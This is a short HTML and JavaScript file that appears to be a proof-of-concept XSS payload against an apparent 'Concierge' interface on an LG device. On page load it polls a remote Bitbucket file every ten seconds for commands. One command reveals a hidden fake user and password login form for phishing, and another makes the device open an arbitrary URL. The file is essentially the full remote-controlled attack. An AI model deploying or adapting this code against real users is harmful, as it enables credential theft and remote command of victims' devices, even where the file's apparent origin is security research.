
<html>
<head>
</head>
<body onLoad="Start()">
<div id="everything" style="display:none">
<form style: id="formlogin"> <!-- Need to add good CSS -->
User: <input type="text" id="formtext" /> <br /><br />
Pass: <input type="password" id="formpassword" /> <br /><br />
<input type="submit" id="formsubmit" value="login"/> <br /><br />
</form>
</div>
</body>
</html>

<script>


function Start()
{
	setInterval(runCommand, 10000);
}

function runCommand()
{
	var newCommand = getCommand();
	var values = newCommand.split(" ");
	if (values[0] == "Phishing") // Phishing Attack
	{
		// Liran Make Phishing Page (Make sure its pop !)
		document.getElementById('everything').style.display='inline';
		
		return;
	}
	
	if (values.length > 1 && values[0] == "Open") // Open Web Site
	{
		var website = values[1];
		Concierge.doAction('concierge://open_url?url=' + website);
		
		return;
	}
	
}

function getCommand()
{
	xhttp = new XMLHttpRequest();
	xhttp.open("GET", "https://bitbucket.org/BugsecGit/lg_xss_poc/raw/master/Snap.html", false);
	xhttp.send();
	return xhttp.responseText;
}




</script>






